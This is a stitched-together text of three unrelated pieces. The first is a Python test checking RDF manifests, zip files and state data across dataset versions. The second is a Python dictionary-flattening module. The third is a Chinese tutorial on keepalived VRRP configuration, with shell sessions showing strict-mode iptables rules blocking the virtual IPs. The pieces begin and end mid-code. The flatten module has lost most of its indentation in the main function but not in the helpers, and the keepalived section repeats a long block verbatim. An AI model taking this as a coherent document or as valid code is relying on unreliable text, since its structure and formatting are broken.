(resp, rdfdata) = self.doHTTP_GET(
resource="datasets/TestSubmission?version=1",
expect_status=200, expect_reason="OK", expect_type="application/rdf+xml")
rdfgraph = Graph()
rdfstream = StringIO(rdfdata)
rdfgraph.parse(rdfstream)
self.assertEqual(len(rdfgraph),12,'Graph length %i' %len(rdfgraph))
self.failUnless((subj,RDF.type,stype) in rdfgraph, 'Testing submission type: '+subj+", "+stype)
self.failUnless((subj,URIRef(dcterms+"created"),None) in rdfgraph, 'dcterms:created')
self.failUnless((subj,URIRef(ore+"aggregates"),URIRef(base+"testdir.zip")) in rdfgraph, 'ore:aggregates testdir.zip')
self.failUnless((subj,URIRef(dcterms+"identifier"),None) in rdfgraph, 'dcterms:identifier')
self.failUnless((subj,URIRef(dcterms+"mediator"),None) in rdfgraph, 'dcterms:mediator')
self.failUnless((subj,URIRef(dcterms+"rights"),None) in rdfgraph, 'dcterms:rights')
self.failUnless((subj,URIRef(dcterms+"license"),None) in rdfgraph, 'dcterms:license')
self.failUnless((subj,URIRef(dcterms+"publisher"),None) in rdfgraph, 'dcterms:publisher')
self.failUnless((subj,URIRef(oxds+"isEmbargoed"),None) in rdfgraph, 'oxds:isEmbargoed')
self.failUnless((subj,URIRef(oxds+"embargoedUntil"),None) in rdfgraph, 'oxds:embargoedUntil')
self.failUnless((subj,URIRef(oxds+"currentVersion"),'1') in rdfgraph, 'oxds:currentVersion')
self.failUnless((subj,URIRef(dcterms+"modified"),None) in rdfgraph, 'dcterms:modified')
# Access and check zip file content
(resp, zipfile) = self.doHTTP_GET(
resource="datasets/TestSubmission/testdir.zip?version=1",
expect_status=200, expect_reason="OK", expect_type="application/zip")
self.assertEqual(zipdata, zipfile, "Difference between local and remote zipfile - Version 1!")
#Access state information and check
(resp, data) = self.doHTTP_GET(
resource="states/TestSubmission?version=1",
expect_status=200, expect_reason="OK", expect_type="application/json")
state = data['state']
parts = data['parts']
self.assertEqual(len(state.keys()), 11, "States")
self.assertEqual(len(parts.keys()), 4, "Parts")
self.assertEqual(len(parts['4=TestSubmission'].keys()), 13, "File stats for 4=TestSubmission")
self.assertEqual(len(parts['manifest.rdf'].keys()), 13, "File stats for manifest.rdf")
self.assertEqual(len(parts['testdir.zip'].keys()), 13, "File stats for testdir.zip")
#---------Version 2
# Access and check list of contents of version 2
(resp, rdfdata) = self.doHTTP_GET(
resource="datasets/TestSubmission?version=2",
expect_status=200, expect_reason="OK", expect_type="application/rdf+xml")
rdfgraph = Graph()
rdfstream = StringIO(rdfdata)
rdfgraph.parse(rdfstream)
self.assertEqual(len(rdfgraph),13,'Graph length %i' %len(rdfgraph))
self.failUnless((subj,RDF.type,stype) in rdfgraph, 'Testing submission type: '+subj+", "+stype)
self.failUnless((subj,URIRef(dcterms+"created"),None) in rdfgraph, 'dcterms:created')
self.failUnless((subj,URIRef(ore+"aggregates"),URIRef(base+"testdir.zip")) in rdfgraph, 'ore:aggregates testdir.zip')
self.failUnless((subj,URIRef(ore+"aggregates"),URIRef(base+"testdir2.zip")) in rdfgraph, 'ore:aggregates testdir2.zip')
self.failUnless((subj,URIRef(dcterms+"identifier"),None) in rdfgraph, 'dcterms:identifier')
self.failUnless((subj,URIRef(dcterms+"mediator"),None) in rdfgraph, 'dcterms:mediator')
self.failUnless((subj,URIRef(dcterms+"rights"),None) in rdfgraph, 'dcterms:rights')
self.failUnless((subj,URIRef(dcterms+"license"),None) in rdfgraph, 'dcterms:license')
self.failUnless((subj,URIRef(dcterms+"publisher"),None) in rdfgraph, 'dcterms:publisher')
self.failUnless((subj,URIRef(oxds+"isEmbargoed"),None) in rdfgraph, 'oxds:isEmbargoed')
self.failUnless((subj,URIRef(oxds+"embargoedUntil"),None) in rdfgraph, 'oxds:embargoedUntil')
self.failUnless((subj,URIRef(oxds+"currentVersion"),'2') in rdfgraph, 'oxds:currentVersion')
self.failUnless((subj,URIRef(dcterms+"modified"),None) in rdfgraph, 'dcterms:modified')
# Access and check zip file content
(resp, zipfile) = self.doHTTP_GET(
resource="datasets/TestSubmission/testdir.zip?version=2",
expect_status=200, expect_reason="OK", expect_type="application/zip")
self.assertEqual(zipdata, zipfile, "Difference between local and remote zipfile - Version 2!")
(resp, zipfile2) = self.doHTTP_GET(
resource="datasets/TestSubmission/testdir2.zip?version=2",
expect_status=200, expect_reason="OK", expect_type="application/zip")
self.assertEqual(zipdata2, zipfile2, "Difference between local and remote zipfile - Version 2!")
#Access state information and check
(resp, data) = self.doHTTP_GET(
resource="states/TestSubmission?version=2",
expect_status=200, expect_reason="OK", expect_type="application/json")
state = data['state']
parts = data['parts']
self.assertEqual(len(state.keys()), 11, "States")
self.assertEqual(len(parts.keys()), 5, "Parts")
self.assertEqual(len(parts['4=TestSubmission'].keys()), 13, "File stats for 4=TestSubmission")
self.assertEqual(len(parts['manifest.rdf'].keys()), 13, "File stats for manifest.rdf")
self.assertEqual(len(parts['testdir.zip'].keys()), 13, "File stats for testdir.zip")
self.assertEqual(len(parts['testdir2.zip'].keys()), 13, "File stats for testdir2.zip")
#---------Version 3
# Access and check list of contents of version 3
(resp, rdfdata) = self.doHTTP_GET(
resource="datasets/TestSubmission?version=3",
expect_status=200, expect_reason="OK", expect_type="application/rdf+xml")
rdfgraph = Graph()
rdfstream = StringIO(rdfdata)
rdfgraph.parse(rdfstream)
self.assertEqual(len(rdfgraph),12,'Graph length %i' %len(rdfgraph))
self.failUnless((subj,RDF.type,stype) in rdfgraph, 'Testing submission type: '+subj+", "+stype)
self.failUnless((subj,URIRef(dcterms+"created"),None) in rdfgraph, 'dcterms:created')
self.failUnless((subj,URIRef(ore+"aggregates"),URIRef(base+"testdir2.zip")) in rdfgraph, 'ore:aggregates testdir2.zip')
self.failUnless((subj,URIRef(dcterms+"identifier"),None) in rdfgraph, 'dcterms:identifier')
self.failUnless((subj,URIRef(dcterms+"mediator"),None) in rdfgraph, 'dcterms:mediator')
self.failUnless((subj,URIRef(dcterms+"rights"),None) in rdfgraph, 'dcterms:rights')
self.failUnless((subj,URIRef(dcterms+"license"),None) in rdfgraph, 'dcterms:license')
self.failUnless((subj,URIRef(dcterms+"publisher"),None) in rdfgraph, 'dcterms:publisher')
self.failUnless((subj,URIRef(oxds+"isEmbargoed"),None) in rdfgraph, 'oxds:isEmbargoed')
self.failUnless((subj,URIRef(oxds+"embargoedUntil"),None) in rdfgraph, 'oxds:embargoedUntil')
self.failUnless((subj,URIRef(oxds+"currentVersion"),'3') in rdfgraph, 'oxds:currentVersion')
self.failUnless((subj,URIRef(dcterms+"modified"),None) in rdfgraph, 'dcterms:modified')
# Access and check zip file content
(resp, zipfile) = self.doHTTP_GET(
resource="datasets/TestSubmission/testdir2.zip?version=3",
expect_status=200, expect_reason="OK", expect_type="application/zip")
self.assertEqual(zipdata2, zipfile, "Difference between local and remote zipfile - Version 3!")
(resp, zipfile) = self.doHTTP_GET(
resource="datasets/TestSubmission/testdir.zip?version=3",
expect_status=404, expect_reason="Not Found")
#Access state information and check
(resp, data) = self.doHTTP_GET(
resource="states/TestSubmission?version=3",
expect_status=200, expect_reason="OK", expect_type="application/json")
state = data['state']
parts = data['parts']
self.assertEqual(len(state.keys()), 11, "States")
self.assertEqual(len(parts.keys()), 4, "Parts")
self.assertEqual(len(parts['4=TestSubmission'].keys()), 13, "File stats for 4=TestSubmission")
self.assertEqual(len(parts['manifest.rdf'].keys()), 13, "File stats for manifest.rdf")
self.assertEqual(len(parts['testdir2.zip'].keys()), 13, "File stats for testdir2.zip")
#---------Version 4
# Access and check list of contents of version 4
(resp, rdfdata) = self.doHTTP_GET(
resource="datasets/TestSubmission?version=4",
expect_status=200, expect_reason="OK", expect_type="application/rdf+xml")
rdfgraph = Graph()
rdfstream = StringIO(rdfdata)
rdfgraph.parse(rdfstream)
self.assertEqual(len(rdfgraph),12,'Graph length %i' %len(rdfgraph))
self.failUnless((subj,RDF.type,stype) in rdfgraph, 'Testing submission type: '+subj+", "+stype)
self.failUnless((subj,URIRef(dcterms+"created"),None) in rdfgraph, 'dcterms:created')
self.failUnless((subj,URIRef(ore+"aggregates"),URIRef(base+"testdir2.zip")) in rdfgraph, 'ore:aggregates testdir2.zip')
self.failUnless((subj,URIRef(dcterms+"identifier"),None) in rdfgraph, 'dcterms:identifier')
self.failUnless((subj,URIRef(dcterms+"mediator"),None) in rdfgraph, 'dcterms:mediator')
self.failUnless((subj,URIRef(dcterms+"rights"),None) in rdfgraph, 'dcterms:rights')
self.failUnless((subj,URIRef(dcterms+"license"),None) in rdfgraph, 'dcterms:license')
self.failUnless((subj,URIRef(dcterms+"publisher"),None) in rdfgraph, 'dcterms:publisher')
self.failUnless((subj,URIRef(oxds+"isEmbargoed"),None) in rdfgraph, 'oxds:isEmbargoed')
self.failUnless((subj,URIRef(oxds+"embargoedUntil"),None) in rdfgraph, 'oxds:embargoedUntil')
self.failUnless((subj,URIRef(oxds+"currentVersion"),'4') in rdfgraph, 'oxds:currentVersion')
self.failUnless((subj,URIRef(dcterms+"modified"),None) in rdfgraph, 'dcterms:modified')
# Access and check zip file content
(resp, zipfile) = self.doHTTP_GET(
resource="datasets/TestSubmission/testdir2.zip?version=4",
expect_status=200, expect_reason="OK", expect_type="application/zip")
self.assertEqual(zipdata3, zipfile, "Difference between local and remote zipfile - Version 4!")
(resp, zipfile) = self.doHTTP_GET(
resource="datasets/TestSubmission/testdir.zip?version=4",
expect_status=404, expect_reason="Not Found")
#Access state information and check
(resp, data) = self.doHTTP_GET(
resource="states/TestSubmission?version=4",
expect_status=200, expect_reason="OK", expect_type="application/json")
state | |
# ----------------------------------------------------------------------------
# Copyright (C) 2017 Verizon. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ----------------------------------------------------------------------------
'''Flatten nested list and dict structures.
A dictionary is *flat* if all of its values are either scalars or
lists of scalars. The ``flatten()`` function turns a nested structure
into a list of flat dictionaries. The keys in the resulting
dictionaries will be strings formed by the dot-separated ``join()``
of successively nested dictionary keys from the original dictionary.
Example::
>>> flatten.flatten({
... 'A': {
... 'b': 1,
... 'c': {
... 'x': 2,
... 'y': 3
... }
... }
... })
[{'A.c.y': 3, 'A.c.x': 2, 'A.b': 1}]
When a structure containing lists is flattened, the result will
include multiple flat dictionaries. A single list ``l`` will result in
``len(l)`` flat dictionaries in the result.
Examples::
>>> flatten.flatten({
... 'A': [
... {'b': {'c': 1}},
... {'b': {'c': 2}}
... ]
... })
[{'A.b.c': 1}, {'A.b.c': 2}]
>>> flatten.flatten({
... 'A': {
... 'b': [
... {'c': 1},
... {'c': 2}
... ]
... }
... })
[{'A.b.c': 1}, {'A.b.c': 2}]
Note that the preceding examples show that flattening different
structures can have the same result.
Multiple lists will result in multiple dictionaries according to the
product of their lengths.
Example::
>>> flatten.flatten({
... 'A': {
... 'b': [{'c': 1}, {'c': 2}, {'c': 3}],
... 'u': [{'v': 1}, {'v': 2}]
... }
... })
[{'A.u.v': 1, 'A.b.c': 1}, {'A.u.v': 2, 'A.b.c': 1},
{'A.u.v': 1, 'A.b.c': 2}, {'A.u.v': 2, 'A.b.c': 2},
{'A.u.v': 1, 'A.b.c': 3}, {'A.u.v': 2, 'A.b.c': 3}]
.. note:: To be successfully flattened, a nested structure must satisfy the
following criterion:
All lists in the structure must contain only ``dict`` or scalar
types, and all elements of a given list must be of the same type.
'''
import itertools
import json
DEFAULT_SEPARATOR = '.'
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# is_scalar_type
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def is_scalar_type(the_type):
    '''Answer "is this type scalar?".

    A scalar type is one whose instances carry a single atomic value:
    ``NoneType``, ``bool``, ``int``, ``float``, ``str``, ``complex``,
    plus Python 2's ``unicode`` and ``long`` when they exist.

    Parameters:
        the_type (type): The type object to classify.

    Returns:
        bool: ``True`` if ``the_type`` is a scalar type.
    '''
    scalar_types = [
        type(None),
        bool,
        int,
        float,
        str,
        complex
    ]
    # Fixed: the original referenced ``unicode`` and ``long`` unconditionally,
    # which raises NameError on Python 3 (where str/int subsume them).
    try:
        scalar_types.extend([unicode, long])  # noqa: F821  (Python 2 only)
    except NameError:
        pass
    return the_type in scalar_types
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# is_scalar
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def is_scalar(the_thing):
    '''Answer "is the type of this thing a scalar type?".

    Convenience wrapper around ``is_scalar_type()`` that classifies a
    value rather than a type object.
    '''
    thing_type = type(the_thing)
    return is_scalar_type(thing_type)
# # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# # is_or_is_dict_of
# # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# def is_or_is_dict_of(the_thing, predicate):
# '''
# Answer "is this a thing or list of things for which predicate is true?"
# '''
# return is_scalar_type(type(the_thing))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# is_primitive_type
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def is_primitive_type(the_type):
    '''Answer "is this type primitive?".

    A primitive type is either a scalar type (see ``is_scalar_type``)
    or one of the container types ``dict`` and ``list``.

    Parameters:
        the_type (type): The type object to classify.

    Returns:
        bool: ``True`` if ``the_type`` is scalar, ``dict`` or ``list``.
    '''
    # Fixed: the original called is_scalar(the_type), which checks
    # type(the_type) — i.e. ``type`` itself — against the scalar list
    # and therefore always returned False for actual scalar types.
    return is_scalar_type(the_type) or the_type in [
        dict,
        list
    ]
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# is_primitive
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def is_primitive(the_thing):
    '''Answer "is the type of this thing a primitive type?".

    Parameters:
        the_thing: Any value; its type is classified.

    Returns:
        bool: ``True`` if ``type(the_thing)`` is a primitive type.
    '''
    # Fixed: the original recursed into is_primitive(type(the_thing)),
    # which never terminates (type(type(...)) is always ``type``) and
    # raises RecursionError; delegate to is_primitive_type instead.
    return is_primitive_type(type(the_thing))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def flatten(
entity,
path_prefix=None,
require_serializable=False,
flatten_leaves=False,
to_depth=None,
separator=DEFAULT_SEPARATOR
): # pylint: disable=bad-continuation
'''Construct a list of flat dicts representing a nested structure.
Parameters:
entity (list or dict)
The python entity to be flattened.
path_prefix (str)
A dot-separated string path. If defined, this will be
prepended to the paths extracted from ``entity``.
require_serializable (bool)
If ``True``, a ``TypeError`` will be raised if an
unserializable type is encountered while flattening
``entity``. If ``False``, a serializable replacement
representation of the unserializable structure will be
substituted (e.g., the result of calling ``str()`` on the
structure.)
flatten_leaves (bool)
If ``False``, lists of scalars will be treated as leaf
nodes. If ``True``, lists of scalars will be flattened.
Example::
>>> flatten.flatten({'A': [1,2,3]})
[{'A': [1, 2, 3]}]
>>> flatten.flatten({'A': [1,2,3]}, flatten_leaves=True)
[{'A': 1}, {'A': 2}, {'A': 3}]
to_depth (int)
The maximum depth to which to flatten.
The return value from ``flatten`` will be a list of dicts, where
each of the dicts values is either a scalar value or a simple list
of scalar values.
The entity being flattened must be a dictionary, list or scalar
value. It can contain no "immediately nested" lists; all lists it
contains must occur as the value for the key of a dict, and must
contain only other dicts or only scalars. A ``TypeError`` will be
raised if any other list is encountered.
If the ``path_prefix`` parameter is ``None``, entity must be an instance
of dict or a list of instances of dict, or a ``ValueError`` will
be raised.
If ``flatten`` encounters an unserializable type at a leaf of a
dict, the behavior is determined by the value of the
``require_serializable`` parameter:
**True:** Raise the ``TypeError`` resulting from attempting to
serialize the structure with ``json.dumps()``.
**False:** First see if the structure responds to a
``to_dict()`` method and use the result of that in place of
the original structure. If this approach doesn't succeed,
replace the original structure with the result of calling
``str()`` on it.
'''
# if to_depth is None:
# print "Flattening(%s): %s" % (to_depth, entity)
if to_depth is not None and to_depth <= 0:
# print "DEEP: %s" % entity
return entity
# Scalar: return a single item dict wrapped in an list.
# Anything else that's not handled further down: try to serialize
# into JSON. If that fails either raise a TypeError or return the
# stringification of the entity.
if not isinstance(entity, list) and not isinstance(entity, dict):
if not is_scalar(entity):
try:
entity = json.dumps(entity)
except TypeError as err:
if require_serializable:
raise err
else:
entity = str(entity)
# print "(scalar) %s" % entity
return entity if path_prefix is None else [{path_prefix: entity}]
elif isinstance(entity, list):
| |
lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:32:80:38 brd ff:ff:ff:ff:ff:ff
inet 10.0.0.7/24 brd 10.0.0.255 scope global noprefixroute eth0
valid_lft forever preferred_lft forever
inet 192.168.200.16/32 scope global eth0
valid_lft forever preferred_lft forever
inet 192.168.200.17/32 scope global eth0
valid_lft forever preferred_lft forever
inet 192.168.200.18/32 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fe32:8038/64 scope link
valid_lft forever preferred_lft forever
[root@centos7 ~]#hostname -I
10.0.0.7 192.168.200.16 192.168.200.17 192.168.200.18
[root@centos7 ~]#ping 192.168.200.16
PING 192.168.200.16 (192.168.200.16) 56(84) bytes of data.
ping: sendmsg: Operation not permitted
ping: sendmsg: Operation not permitted
^C
--- 192.168.200.16 ping statistics ---
2 packets transmitted, 0 received, 100% packet loss, time 1000ms
[root@centos7 ~]#iptables -vnL
Chain INPUT (policy ACCEPT 860 packets, 46129 bytes)
pkts bytes target prot opt in out source destination
0 0 DROP all -- * * 0.0.0.0/0 192.168.200.18
0 0 DROP all -- * * 0.0.0.0/0 192.168.200.17
0 0 DROP all -- * * 0.0.0.0/0 192.168.200.16
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 1737 packets, 1188K bytes)
pkts bytes target prot opt in out source destination
4 336 DROP all -- * * 192.168.200.18 0.0.0.0/0
0 0 DROP all -- * * 192.168.200.17 0.0.0.0/0
0 0 DROP all -- * * 192.168.200.16 0.0.0.0/0
[root@centos7 ~]#vim /etc/keepalived/keepalived.conf
#注释下面一行
#vrrp_strict
#重启动不生效,有bug
[root@centos7 ~]#systemctl restart keepalived.service
[root@centos7 ~]#ping 192.168.200.16
PING 192.168.200.16 (192.168.200.16) 56(84) bytes of data.
ping: sendmsg: Operation not permitted
ping: sendmsg: Operation not permitted
^C
--- 192.168.200.16 ping statistics ---
2 packets transmitted, 0 received, 100% packet loss, time 999ms
[root@centos7 ~]#iptables -vnL
Chain INPUT (policy ACCEPT 1219 packets, 67647 bytes)
pkts bytes target prot opt in out source destination
0 0 DROP all -- * * 0.0.0.0/0 192.168.200.18
0 0 DROP all -- * * 0.0.0.0/0 192.168.200.17
0 0 DROP all -- * * 0.0.0.0/0 192.168.200.16
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 2282 packets, 1233K bytes)
pkts bytes target prot opt in out source destination
4 336 DROP all -- * * 192.168.200.18 0.0.0.0/0
0 0 DROP all -- * * 192.168.200.17 0.0.0.0/0
4 336 DROP all -- * * 192.168.200.16 0.0.0.0/0
#无法关闭进程
[root@centos7 ~]#systemctl stop keepalived.service
[root@centos7 ~]#ps aux|grep keepalived
root 1383 0.0 0.1 69672 1020 ? Ss 00:57 0:00 /usr/local/keepalived/sbin/keepalived -D
root 1384 0.0 0.2 69804 2308 ? S 00:57 0:00 /usr/local/keepalived/sbin/keepalived -D
root 1385 0.0 0.1 69672 1308 ? S 00:57 0:00 /usr/local/keepalived/sbin/keepalived -D
root 1392 0.0 0.0 112712 964 pts/0 R+ 00:59 0:00 grep --color=auto keepalived
[root@centos7 ~]#killall keepalived
[root@centos7 ~]#systemctl start keepalived.service
[root@centos7 ~]#ping 192.168.200.16
PING 192.168.200.16 (192.168.200.16) 56(84) bytes of data.
64 bytes from 192.168.200.16: icmp_seq=1 ttl=64 time=0.093 ms
^C
--- 192.168.200.16 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.093/0.093/0.093/0.000 ms
[root@centos7 ~]#iptables -vnL
Chain INPUT (policy ACCEPT 125 packets, 8493 bytes)
pkts bytes target prot opt in out source destination
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 135 packets, 20190 bytes)
pkts bytes target prot opt in out source destination
'''
KeepAlived 配置说明
配置文件组成部分
'''
/etc/keepalived/keepalived.conf
'''
配置组成
'''
-GLOBAL CONFIGURATION
Global definitions:定义邮件配置,route_id,vrrp配置,多播地址等
-VRRP CONFIGURATION
VRRP instance(s):定义每个vrrp虚拟路由器
-LVS CONFIGURATION
Virtual server group(s)
Virtual server(s):LVS集群的VS和RS
'''
配置语法说明
全局配置
'''
#/etc/keepalived/keepalived.conf
global_defs {
notification_email {
root@localhost #keepalived 发生故障切换时邮件发送的目标邮箱,可以按行区分写多个
<EMAIL>
<EMAIL>
}
notification_email_from keepalived@localhost #发邮件的地址
smtp_server 127.0.0.1 #邮件服务器地址
smtp_connect_timeout 30 #邮件服务器连接timeout
router_id ha1.example.com #每个keepalived主机唯一标识,建议使用当前主机名,但多节点重名不影响
vrrp_skip_check_adv_addr #对所有通告报文都检查,会比较消耗性能,启用此配置后,如果收到的通告报文和上一个报文是同一个路由器,则跳过检查,默认值为全检查
vrrp_strict #严格遵守VRRP协议,禁止以下状况:1.无VIP地址 2.配置了单播邻居 3.在VRRP版本2中有IPv6地址,开启动此项会自动开启iptables防火墙规则,建议关闭此项配置,
vrrp_garp_interval 0 #gratuitous ARP messages报文发送延迟,0表示不延迟
vrrp_gna_interval 0 #unsolicited NA messages (不请自来)消息发送延迟
vrrp_mcast_group4 172.16.31.10 #指定组播IP地址,默认值:172.16.31.10 范围:172.16.31.10到192.168.3.11
vrrp_iptables #开启此项,当vrrp_strict开启时,不添加防火墙规则,否则VIP无法访问
}
'''
配置虚拟路由器
'''
vrrp_instance <STRING> {
配置参数
......
}
#配置参数:
state MASTER|BACKUP#当前节点在此虚拟路由器上的初始状态,状态为MASTER或者BACKUP
interface IFACE_NAME #绑定为当前虚拟路由器使用的物理接口,如:ens32,eth0,bond0,br0
virtual_router_id VRID #每个虚拟路由器惟一标识,范围:0-255,每个虚拟路由器此值必须唯一,否则服务无法启动,同属一个虚拟路由器的多个keepalived节点必须相同
priority 100 #当前物理节点在此虚拟路由器的优先级,范围:1-254,每个keepalived主机节点此值不同
advert_int 1 #vrrp通告的时间间隔,默认1s
authentication { #认证机制
auth_type AH|PASS
auth_pass <PASSWORD> #预共享密钥,仅前8位有效,同一个虚拟路由器的多个keepalived节点必须一样
}
virtual_ipaddress { #虚拟IP
<IPADDR>/<MASK> brd <IPADDR> dev <STRING> scope <SCOPE> label <LABEL>
192.168.200.100 #指定VIP,不指定网卡,默认为eth0,注意:不指定/prefix,默认为/32
192.168.200.101/24 dev eth1 #指定VIP的网卡
192.168.200.102/24 dev eth2 label eth2:1 #指定VIP的网卡label
}
track_interface { #配置监控网络接口,一旦出现故障,则转为FAULT状态实现地址转移
eth0
eth1
…
}
'''
范例:
'''
[root@centos7 ~]#cat /etc/keepalived/keepalived.conf
! Configuration File for keepalived
global_defs {
notification_email {
<EMAIL>
<EMAIL>
<EMAIL>
}
notification_email_from <EMAIL>
smtp_server 192.168.200.1
smtp_connect_timeout 30
router_id LVS_DEVEL
vrrp_skip_check_adv_addr
vrrp_strict #开启限制,会自动生效防火墙设置,导致无访问VIP
vrrp_garp_interval 0
vrrp_gna_interval 0
}
vrrp_instance VI_1 {
state MASTER
interface eth0
virtual_router_id 80 #修改此行
priority 100
advert_int 1
authentication {
auth_type PASS
auth_pass <PASSWORD>
}
virtual_ipaddress {
192.168.200.16
192.168.200.17
192.168.200.18
}
}
[root@centos7 ~]#systemctl start keepalived.service
[root@centos7 ~]#ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:33:b4:1a brd ff:ff:ff:ff:ff:ff
inet 10.0.0.17/24 brd 10.0.0.255 scope global noprefixroute eth0
valid_lft forever preferred_lft forever
inet 192.168.200.16/32 scope global eth0
valid_lft forever preferred_lft forever
inet 192.168.200.17/32 scope global eth0
valid_lft forever preferred_lft forever
inet 192.168.200.18/32 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fe33:b41a/64 scope link
valid_lft forever preferred_lft forever
[root@centos7 ~]#iptables -vnL
Chain INPUT (policy ACCEPT 59 packets, 3372 bytes)
pkts bytes target prot opt in out source destination
0 0 DROP all -- * * 0.0.0.0/0 192.168.200.16
0 0 DROP all -- * * 0.0.0.0/0 192.168.200.17
0 0 DROP all -- * * 0.0.0.0/0 192.168.200.18
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 33 packets, 6940 bytes)
pkts bytes target prot opt in out source destination
[root@centos7 ~]#ping 192.168.200.16
PING 192.168.200.16 (192.168.200.16) 56(84) bytes of data.
^C
--- 192.168.200.16 ping statistics ---
6 packets transmitted, 0 received, 100% packet loss, time 5002ms
[root@centos7 ~]#
# 如果是CentOS 8 ,会显示以下warning
[root@centos8 ~]#iptables -vnL
Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
# Warning: iptables-legacy tables present, use iptables-legacy to see them
#无法访问VIP
[root@centos8 ~]#ping 192.168.200.16
PING 192.168.200.16 (192.168.200.16) 56(84) bytes of data.
^C
--- 192.168.200.16 ping statistics ---
6 packets transmitted, 0 received, 100% packet loss, time 143ms
'''
实现独立子配置文件
当生产环境复杂时,
'''
/etc/keepalived/keepalived.conf
'''
文件中内容过多,不易管理,可以将不同集群的配置,比如:不同集群的VIP配置放在独立的子配置文件中
'''
[root@ka1-centos8 ~]#mkdir /etc/keepalived/conf.d/
[root@ka1-centos8 ~]#tail -n1 /etc/keepalived/keepalived.conf
include /etc/keepalived/conf.d/*.conf
[root@ka1-centos8 ~]#vim /etc/keepalived/conf.d/cluster1.conf
'''
本文链接:http://www.yunweipai.com/35366.html
----------------------------------------------
Keepalived - 配置虚拟路由器
配置虚拟路由器
'''
vrrp_instance <STRING> {
配置参数
......
}
#配置参数:
state MASTER|BACKUP#当前节点在此虚拟路由器上的初始状态,状态为MASTER或者BACKUP
interface IFACE_NAME #绑定为当前虚拟路由器使用的物理接口,如:ens32,eth0,bond0,br0
virtual_router_id VRID #每个虚拟路由器惟一标识,范围:0-255,每个虚拟路由器此值必须唯一,否则服务无法启动,同属一个虚拟路由器的多个keepalived节点必须相同
priority 100 #当前物理节点在此虚拟路由器的优先级,范围:1-254,每个keepalived主机节点此值不同
advert_int 1 #vrrp通告的时间间隔,默认1s
authentication { #认证机制
auth_type AH|PASS
auth_pass <PASSWORD> #预共享密钥,仅前8位有效,同一个虚拟路由器的多个keepalived节点必须一样
}
virtual_ipaddress { #虚拟IP
<IPADDR>/<MASK> brd <IPADDR> dev <STRING> scope <SCOPE> label <LABEL>
192.168.200.100 #指定VIP,不指定网卡,默认为eth0,注意:不指定/prefix,默认为/32
192.168.200.101/24 dev eth1 #指定VIP的网卡
192.168.200.102/24 dev eth2 label eth2:1 #指定VIP的网卡label
}
track_interface { #配置监控网络接口,一旦出现故障,则转为FAULT状态实现地址转移
eth0
eth1
…
}
'''
范例:
'''
[root@centos7 ~]#cat /etc/keepalived/keepalived.conf
! Configuration File for keepalived
global_defs {
notification_email {
<EMAIL>
<EMAIL>
<EMAIL>
}
notification_email_from <EMAIL>
smtp_server 192.168.200.1
smtp_connect_timeout 30
router_id LVS_DEVEL
vrrp_skip_check_adv_addr
vrrp_strict #开启限制,会自动生效防火墙设置,导致无访问VIP
vrrp_garp_interval 0
vrrp_gna_interval 0
}
vrrp_instance VI_1 {
state MASTER
interface eth0
virtual_router_id 80 #修改此行
priority 100
advert_int 1
authentication {
auth_type PASS
auth_pass <PASSWORD>
}
virtual_ipaddress {
192.168.200.16
192.168.200.17
192.168.200.18
}
}
[root@centos7 ~]#systemctl start keepalived.service
[root@centos7 ~]#ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
